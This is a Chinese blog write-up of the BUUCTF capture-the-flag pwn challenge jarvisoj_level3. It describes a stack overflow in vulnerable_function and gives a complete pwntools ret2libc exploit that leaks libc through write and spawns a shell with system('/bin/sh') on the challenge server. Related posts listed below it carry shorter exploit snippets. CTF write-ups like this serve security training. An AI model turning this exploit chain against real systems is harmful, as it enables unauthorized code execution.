BUUCTF pwn——jarvisoj_level3

最新推荐文章于 2023-05-24 21:27:54 发布
最新推荐文章于 2023-05-24 21:27:54 发布
阅读量191 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130288288
版权
文章描述了一个针对名为vulnerable_function的函数的栈溢出漏洞,利用ret2libc方法来构造exploit。通过ida分析,确定了栈空间大小和利用思路。使用python的pwn库进行远程或本地连接,寻找libc的write和system符号地址,最终获取shell并读取flag。
摘要由CSDN通过智能技术生成

checksec

在这里插入图片描述

运行

直接输入就行
在这里插入图片描述

ida

名为vulnerable_function的函数,存在溢出

在这里插入图片描述

给输入分配的栈空间为0x88

在这里插入图片描述

利用思路

ret2libc

代码

'''
@Author       : 白银
@Date         : 2023-04-21 14:10:32
@LastEditors  : 白银
@LastEditTime : 2023-04-21 14:36:09
@FilePath     : /pwn/level3.py
@Description  : https://buuoj.cn/challenges#jarvisoj_level3
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './level3'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 26305)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        # libc = elf.libc
        libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        # libc = elf.libc
        libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    # libc = elf.libc
    libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x8c # ida看,buf和r差多少
write_plt = elf.plt['write']
print("write_plt------", hex(write_plt))
write_got = elf.got['write']
print("write_got------", hex(write_got))
return_addr = elf.symbols['main']
print("return_addr------", hex(return_addr))
# return_addr = 0x804844b

# 1 是文件描述符,表示标准输出
# write_got在write函数内部被解释为输出的数据的地址;
# 4 是要写入到标准输出的字节数
# ssize_t write(int fd, const void *buf, size_t count); //这是write函数
# ssize_t write(1, write_got, 4); //这是payload的布局
# 利用write()函数向输出流中写入数据,在这个过程中泄露出libc基址
payload = flat(['a' * padding , write_plt, return_addr, 1, write_got, 4])
io.recvuntil("Input:\n")
io.sendline(payload)

write_addr = u32(io.recv(4))# x86一个指针占4字节
print("write_addr------", hex(write_addr))
    
# libc = finder('write', write_addr)
# libc_base = write_addr - libc.dump('write')
# system_addr = libc_base + libc.dump('system')
# bin_sh_addr = libc_base + libc.dump('str_bin_sh')

libc_base = write_addr - libc.symbols['write']
print("libc_base------", hex(libc_base))
system_addr = libc_base + libc.symbols['system']
print("system_addr------", hex(system_addr))
bin_sh_addr = libc_base + libc.search(b'/bin/sh').__next__()
print("bin_sh_addr------", hex(bin_sh_addr))

payload2 = flat(['a' * padding, system_addr, 0xdeadbeef, bin_sh_addr]) # x86在函数和参数之间要占位符

# sleep(1)
io.sendlineafter('Input:\n', payload2)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
专栏目录
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 510
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF Pwn jarvisoj_level21解题步骤
最新发布
2301_81505831的博客
02-04 266
这里需要注意的是,由于我们是直接调用system()而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值。从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出。查看之后发现是32位的ELF文件,RELRO和NX保护不影响我们做题。buf到ebp的距离是0x88,ebp到Return的距离是0xF。system的地址可以在plt中找到,双击system.plt。然后在输入shift+F12,可以查找。
BUUCTFjarvisoj_level3
m0_51251108的博客
12-28 381
BUUCTFjarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 325
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
BUUCTF jarvisoj_level3
红叶的博客
10-27 397
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
buuctf jarvisoj_level3(libc)
carol2358的博客
05-01 380
常规32位泄漏libc exp: from pwn import * from LibcSearcher import * local_file = './level3' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc.so.6' select = 1 if select == 0: ...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 328
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 547
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 715
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 299
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1290
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
BUUCTF-jarvisoj_level3
Rt1Text的博客
11-27 228
main很明显的溢出点再没有其它有用的信息,而且本题没有system,bin/sh既然如此,解决思路就有了,泄露libc,32位的ret2libc3。
jarvisoj level3
sun的博客
10-03 1061
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
jarvisoj_level3
小白垃圾笔记2
05-24 194
思路是通过write泄露write的地址,然后计算偏移。小白垃圾笔记,不建议阅读。拷贝到本地,感觉方便多了。
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 176
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 800
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
jarvisoj_level1
08-28
很抱歉,我无法回答这个问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新,欢迎共享,不要白嫖哦](https://download.csdn.net/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值